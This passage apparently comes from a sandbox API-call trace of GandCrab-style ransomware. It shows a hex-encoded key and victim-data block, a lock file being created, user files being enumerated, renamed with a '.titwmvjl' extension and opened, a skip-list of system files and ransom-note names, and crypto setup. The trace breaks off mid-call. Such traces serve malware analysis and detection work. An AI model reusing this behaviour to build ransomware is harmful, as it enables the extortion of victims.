57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.502] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.503] CloseHandle (hObject=0x2bc) returned 1 [0072.503] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.504] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.504] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x338)) [0072.504] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.504] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.504] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.505] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a09d2ca4deb61a.lock") returned 79 [0072.505] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.507] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.507] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.507] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\") returned 55 [0072.507] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*" [0072.507] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503738 [0072.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.508] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.508] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.508] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.508] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.508] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.508] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a09d2ca4deb61a.lock" [0072.508] lstrlenW (lpString=".titwmvjl") returned 9 [0072.508] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a09d2ca4deb61a.lock") returned 79 [0072.508] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.509] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0072.509] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a09d2ca4deb61a.lock") returned 79 [0072.509] lstrlenW (lpString=".lock") returned 5 [0072.509] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.509] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.509] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.509] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.509] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.509] lstrcmpW (lpString1="MSO1033.acl", lpString2=".") returned 1 [0072.509] lstrcmpW (lpString1="MSO1033.acl", lpString2="..") returned 1 [0072.509] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="MSO1033.acl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" [0072.509] lstrlenW (lpString=".titwmvjl") returned 9 [0072.509] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0072.509] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.510] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.titwmvjl") returned 75 [0072.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0072.510] lstrlenW (lpString=".acl") returned 4 [0072.510] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.510] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".acl ") returned 5 [0072.510] lstrcmpiW (lpString1=".acl", lpString2=".titwmvjl") returned -1 [0072.510] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0072.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="desktop.ini") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="autorun.inf") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntuser.dat") returned -1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="iconcache.db") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="bootsect.bak") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="boot.ini") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntuser.dat.log") returned -1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="thumbs.db") returned -1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="KRAB-DECRYPT.html") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="CRAB-DECRYPT.html") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntldr") returned -1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="NTDETECT.COM") returned -1 [0072.510] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Bootfont.bin") returned 1 [0072.510] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0072.510] lstrlenW (lpString=".acl") returned 4 [0072.511] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.511] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".acl ") returned 5 [0072.511] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.511] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.511] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0072.512] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.512] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0072.746] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.747] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0072.747] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.747] 